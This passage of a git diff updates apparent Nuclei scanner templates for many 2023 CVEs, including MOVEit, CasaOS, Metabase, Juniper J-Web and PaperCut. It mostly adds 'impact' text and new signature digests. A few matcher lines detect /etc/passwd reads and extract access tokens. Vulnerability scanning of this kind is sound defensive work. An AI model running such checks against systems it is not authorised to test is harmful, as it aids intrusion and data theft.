+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220065f2c96d87303fe1580bf105f8a91be1dee6e22b025fb46b1eadfbd7690d3d1022100818118ff18ec9b76030c747dffd1fd7ad8a7fee84887b09fb8b3fba7543dfca6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220413f43e1ffb1d7103072e5ed58572e007020fffa76bff7e042e3235f721636f8022100e089ed6cf7f36ca2e03e4bb27397c4048e1d52af0378a7f8190c9e0adad44230:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml
index 24ae66eee3..9108eefadc 100644
--- a/http/cves/2023/CVE-2023-36844.yaml
+++ b/http/cves/2023/CVE-2023-36844.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
   remediation: |
     Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
   reference:
@@ -79,4 +81,4 @@ http:
         regex:
           - "([a-f0-9]{64}\\.ini)"
         internal: true
-# digest: 4a0a0047304502202386303620c4685376e3ca8452cd808559a90bd0c7c245b910cc44436887dfdb022100951201e31bca21c1f80b863efc44aa2f30227064de81fe03fab771b272e7d0d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207f5df0937ea656e1beb18a3bef46b763036eac0101d64c4184e19b64a2fa17d2022100ea46c15541cec07e57c519c65b20a1a0df4c2e2736d28329ab02a3ed76fa7e46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml
index 5fae606088..7a01387460 100644
--- a/http/cves/2023/CVE-2023-36845.yaml
+++ b/http/cves/2023/CVE-2023-36845.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   reference:
     - https://vulncheck.com/blog/juniper-cve-2023-36845
     - https://nvd.nist.gov/vuln/detail/CVE-2023-36845
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022029946767a5de4916fd398a3401d3c0882cf3eceae0c63488e7a2f10ea2f7805c02207febbcd64d1eb14b9a70f7290659d1e67782b22855d8f1594dc17927662abc92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100961bda771ca79e3dd3cc9736df4ed98f8f57b72de0073bf218ba9912554d3c8502205a141b4852833ab4b9c4363c7864347559e4198c534608561351444d762d5c62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml
index 3ae1ea1493..d6496e7d44 100644
--- a/http/cves/2023/CVE-2023-36934.yaml
+++ b/http/cves/2023/CVE-2023-36934.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, modification of data, or even complete compromise of the application and underlying systems.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the MOVEit Transfer application.
   reference:
@@ -99,4 +101,4 @@ http:
         regex:
           - '"access_token":"([^"]+)"'
         part: body_4
-# digest: 4a0a00473045022100b80bb3a8a5c8055bfdb3d79f321110e9d6faaf12e0804323a3232de61d711a810220234e07b26bee246592368a7770a7f9a421132f323c029f314ed4898483bb2ab9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c8f595a7b8875eb31a8a41b201f5188b44d1ca47d3147a72677753160d54d231022100a584e5aa7dd1f8b1a8bcc7781463af5d35df7533cedb6645b909f524512d122e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml
index 684f0f43b8..747fcfcaa3 100644
--- a/http/cves/2023/CVE-2023-37265.yaml
+++ b/http/cves/2023/CVE-2023-37265.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
+  impact: |
+    Successful exploitation allows unauthorized access to the CasaOS system.
   remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4.
   reference:
     - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad
@@ -49,4 +51,4 @@ http:
       - type: json
         json:
           - .data.content[].path
-# digest: 4a0a0047304502205dca1eb79fc44f7d37d76c65fb6fc79bf2ae451e6871cc879109764320765a3c022100a767dcff845205b4459f92f8792ad85d281d74cad267fcc7306d38608ab7576a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022053ce35d22e8554485dc56aacc3c5788f21f146249f128fcb784543dbdcddff12022100abc1f725402af8df79391fcf1714731651f64fb34622f9bfb2a96e6b62d6f62b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml
index db18e55500..0669b6e94b 100644
--- a/http/cves/2023/CVE-2023-37266.yaml
+++ b/http/cves/2023/CVE-2023-37266.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
+  impact: |
+    Successful exploitation allows unauthorized access to the CasaOS system.
   remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4.
   reference:
     - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad
@@ -50,4 +52,4 @@ http:
       - type: json
         json:
           - .data.content[].path
-# digest: 4a0a00473045022057622e74af44b242cf3a83f8641123919a82c64774340e4a57e60b555c44d0aa022100e98f6fba0338782d5977fbfa9c8bf3c9939d9e4837beeabe98e0e9a6e458f44b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e605ecfa8c195d5bd0f49a5cc71cb3a3d3adc68cdd1c4102e1f1f1a4e85cb0ca022070992e1e57171c2d588c93b1fcadef408231b3cd3bc8e5bf1e30e96446463524:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml
index d9e9a556f5..5e3354a688 100644
--- a/http/cves/2023/CVE-2023-37270.yaml
+++ b/http/cves/2023/CVE-2023-37270.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Upgrade to a patched version of Piwigo or apply the necessary security patches provided by the vendor.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008a7852ab16614b781c0e1911d329b3b33be9999f31d5a40cef572d20d12c5f1602205968215b1d7d8833fdd72854f056a4db27a0672737d286fcfffdfb51f6ade102:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200771648ea286a51c1a6d909ebe81944a75775645d9119ab7afdf6b3e1ea89347022100fb65396136a737f55b796b9f0127df51357a3429efdec61942b05c75b87a1274:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml
index c4e57f46ae..89bdcd67b3 100644
--- a/http/cves/2023/CVE-2023-37462.yaml
+++ b/http/cves/2023/CVE-2023-37462.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade.
   reference:
     - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
@@ -57,4 +59,4 @@ http:
           - contains(header_2, "text/html")
           - status_code_2 == 200
         condition: and
-# digest: 4a0a00473045022047388a1339c45321645213d3141cc05f1abacbea1351f249ce9d7f6125448016022100ef864c9cb2ae5426b120dcd40c3dbaff3488b0c474e8861cc51352e5b0a4b804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100af804087f635f1ae4587e628447f9ae5c9b2cf67961a133e50a7194dc4dc9bf90221008bf0b883ecc4987e5553a3700b6bddb437c49dbac27a6ec3ce2714f4a64ac006:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml
index 28f34ed54e..c6849e91f4 100644
--- a/http/cves/2023/CVE-2023-37580.yaml
+++ b/http/cves/2023/CVE-2023-37580.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220312a200fb4daed28e05fbcfc80695d70b935adf843ff3c5421c5764136ce5b2102203f74d8add74fed4cb49823ea41ba3a919316f947949671aa43f6eee38c9e0080:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100827d5ece159639db73db733f7fbfa1e4d9a26b777ed25cf397c95292b10264d00221008d3d293becf787b5258825710e133c1fdbeef6e582089fe02ccd907893231f73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml
index 64eb540fed..8c6935563c 100644
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server.
   reference:
     - https://www.exploit-db.com/exploits/51598
     - https://nvd.nist.gov/vuln/detail/CVE-2023-37629
@@ -23,7 +25,7 @@ info:
     max-request: 1
     vendor: simple_online_piggery_management_system_project
     product: simple_online_piggery_management_system
-  tags: cve,cve2023,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
+  tags: cve,cve2023,fileupload,rce,opms,intrusive
 
 http:
   - raw:
@@ -79,4 +81,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "successfully created")'
         condition: and
-# digest: 4b0a00483046022100aca36780cdf0574edd92ee6491b761c93c1432000174d7a43f620429c83fcddb0221009ef6ae91b784b299356e03e08ddf4d6d49d4ca012758dd4dc81e6baebc6952db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008d4bf17be688b0cdabbd2bbb8f8ce8d860e63de72dca0f6424772176bbc5e1930220041d377104de7afdb73a8a3acd7b910a468834ea97edfcaf9c880cee2edaf118:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml
index bce376eaad..a815081248 100644
--- a/http/cves/2023/CVE-2023-3765.yaml
+++ b/http/cves/2023/CVE-2023-3765.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
   remediation: |
     Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022040180baadffa6d1c2c29a983dcc1dcfb01195e6da99f5019459e221a1a4da4f5022025b70d07caef4373d8e1da1c110eacfad49896b21efa3c6f3b3dfeab5dc10077:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022074f5a1fa5d5a097a2564d2484a78ae1bcd51f868d2650108e7ca90c4186dca0e02203cd5dd36d20c27012162307be0fca56e14b081b334701462abd482207acaf3c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml
index a6082c23b8..27805e250c 100644
--- a/http/cves/2023/CVE-2023-38035.yaml
+++ b/http/cves/2023/CVE-2023-38035.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the system.
   remediation: |
     Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - contains(interactsh_protocol, 'dns')
           - status_code == 200
         condition: and
-# digest: 4a0a00473045022100f31b8f52d2ab2438b9fd84570569820991073721c5c9ebc678f6178303476f820220562205014df8b71eb40add18461a2f5547aa9d4f21ae818084ab2a48cfa7721b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206f7e292e35de35f17c9a57945bc3a7ce6e0b691824ee9eb829104f38e9f48f0b022065dc47446499328350d2be27256ccdf9b877b9e88b9118a407da7845a78e19be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml
index dcb06ecea3..b1bfc03904 100644
--- a/http/cves/2023/CVE-2023-38205.yaml
+++ b/http/cves/2023/CVE-2023-38205.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - status_code == 200
           - len(trim_space(body)) == 106
         condition: and
-# digest: 4a0a00473045022100c9815c9478bfe053a2a2049c4bc8844c946a8f09c3aa753fc66400f4ae6a9dc902205ec28c3be758d17400f2cfc3464bfc07a4f02f8f4191e74152e3b623224eee34:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100adf483842cfa3e08fb1a11aef6efeda725eea5705b231ec019674549f9ee2a9a02204b45f7ea8d2cd393931843a20533250697db3f770420e7eae06cc1f4d07eadbd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml
index e7b0b05f25..fa77141dde 100644
--- a/http/cves/2023/CVE-2023-38433.yaml
+++ b/http/cves/2023/CVE-2023-38433.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.
   reference:
     - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
     - https://nvd.nist.gov/vuln/detail/CVE-2023-38433
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201a480033e6adc9142e5a31cf8617e392a1fb4a2453268182d8bf6059527d54ce022100dff79dd89cf968fb5cf8a20feca04fe5fc53de93d75d06f0bf10ca29cf55d08a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ccfe199a5baacc9a1426a3028665c97bc1c971e16938723e8e90e59f5fcce3da022035a4a687185b184253d67e3fa8f057373167a706b65412f7d11b1623969b5dbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml
index d53b9dd0e2..3bd30b8f12 100644
--- a/http/cves/2023/CVE-2023-38646.yaml
+++ b/http/cves/2023/CVE-2023-38646.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.
   reference:
@@ -70,4 +72,4 @@ http:
           - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
           - status_code_2 == 400
         condition: and
-# digest: 490a004630440220418888739475a22fb7e6247776d86a5c3d1068487a1cf013f27bfe764430747802205534decfc8bbf119cff868cee990247a3b5a5e53eb73b3d73f60f9247943524c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b19931d4e414729d27bc20d92a89006b1ae6d21e48a2d6f1d8120a1e1c3db42f0221009056727a1d3c8031dcb8cfb70c310c2730a3bd7ee9f477ee6f6616177ea6e122:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml
index e56789286a..d71cef55b3 100644
--- a/http/cves/2023/CVE-2023-39026.yaml
+++ b/http/cves/2023/CVE-2023-39026.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
+  impact: |
+    An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
   reference:
@@ -42,4 +44,4 @@ http:
           - "contains(content_type, 'text/plain')"
           - "status_code == 200"
         condition: and
-# digest: 4a0a00473045022100d638d3195d5b9753f62e2867edc5a286ca85f011a4534b353edbe58197c40fd7022072ab3d60358566085e0800f37bd46116a342a55cac6b517375d7ba4c171c0b4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206c465389eca562013012c2f59d54fcd9dad9f42c445171863ab51f23c6a0901b02204de1cf253ebf88c338605ecd786ad965ef054ed2edd66ec260a05056bf53dec1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml
index 6ef50eaa0e..77564a2792 100644
--- a/http/cves/2023/CVE-2023-39120.yaml
+++ b/http/cves/2023/CVE-2023-39120.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
+  impact: |
+    An attacker can exploit this vulnerability to view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39120
@@ -45,5 +47,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100bc349f8aa4fdf0220f3443969220d03ba76aec246def2ce278fe2ab65f0bd7cb022100e3efb53874218105f84d2510de8a6d9daae1157415abfbf36232dc624a9920f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207cf4e4e17a1a2867c110c355d8d040b3d1e3928b90a21fcefdc031200f1c3213022100950b231956f35d5890c6c830487332eac64bef345d33814f7e64167fb8c074ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml
index 833b82b4bc..97e55c6a66 100644
--- a/http/cves/2023/CVE-2023-39141.yaml
+++ b/http/cves/2023/CVE-2023-39141.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'contains(body_1, "Aria2 WebUI")'
           - 'regex("root:x:0:0:",body_2)'
         condition: and
-# digest: 4a0a00473045022100e5a7cdca57217ba1ebd6e7b0a36f64914a71976f05d64d3c0e0b05bb0d24971f022076b855712d31fb5abf3ce75a0adce8c68f28d35a3fd95d1e07ac8ffe1acc42e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f7e8ab5830ea191228e35a4c25d0e41bf56ee866d9103fddf23dabf47e68f91f0220475cffcba4c39208a8b736f257c031ce4558ebd0e5f48716761ffd0b1934c26f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml
index 4dad1513bb..c40446bd2b 100644
--- a/http/cves/2023/CVE-2023-39143.yaml
+++ b/http/cves/2023/CVE-2023-39143.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of information or remote code execution.
   remediation: |
     Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - contains(to_lower(content_type), "image/png")
           - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex
         condition: and
-# digest: 4a0a0047304502210082103236d97e724b92980546d172bd27fea209715d6e7e2b6412ed843ec0188802204960ac0594a6259dbf9395390d71274f85a8a01998d1006e6b90b1404371d628:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fc93bdc6ef2a4b99fcd72815a5e431913acabc51d775ac4cf5fedc55d4ff736002201e6deacfc5b66c17253feb08028d258b8e92f4f7b089f7b2feffd97292dcaca2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml
index c551302de1..a1b1558489 100644
--- a/http/cves/2023/CVE-2023-3936.yaml
+++ b/http/cves/2023/CVE-2023-3936.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009c1d510be5f51fe704ce0443646b01347099976317e047db44657b3f947ead1e02200def79ddaa62686eb622a56756785c4da61181c028991041cc1c413819535326:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d20ddec85dbb7741e3224182de80c8c2c004d80e30540290cf59809037004366022100bc0d6be24253100739c243a7e5fa080da025ff3bf4c40bef526fa20c8ae19109:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml
index d35ab102a7..035c9f2b4a 100644
--- a/http/cves/2023/CVE-2023-39361.yaml
+++ b/http/cves/2023/CVE-2023-39361.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   reference:
     - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39361
@@ -42,4 +44,4 @@ http:
           - 'status_code == 200'
           - 'contains_all(body, "Tree Mode", "cacti")'
         condition: and
-# digest: 4a0a00473045022026a339f9bad0e56e9cc502683dab97c218d88d1e842e15ede89fde412d758970022100c9d399b5914eb183beaed606e3a400e82bea136954bf7ccf487d34f9c0d35c9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f0995d243e2f6a8ee5335fe1e9dc139c0dd1bff179b73a3bf29234580d02d5a8022100d4047d770ec191d33ad8e6be8e81608152ebd1d659a1c506710ee14ba4240c1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml
index 36614702aa..0ecd618a76 100644
--- a/http/cves/2023/CVE-2023-39598.yaml
+++ b/http/cves/2023/CVE-2023-39598.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   reference:
     - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39598
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
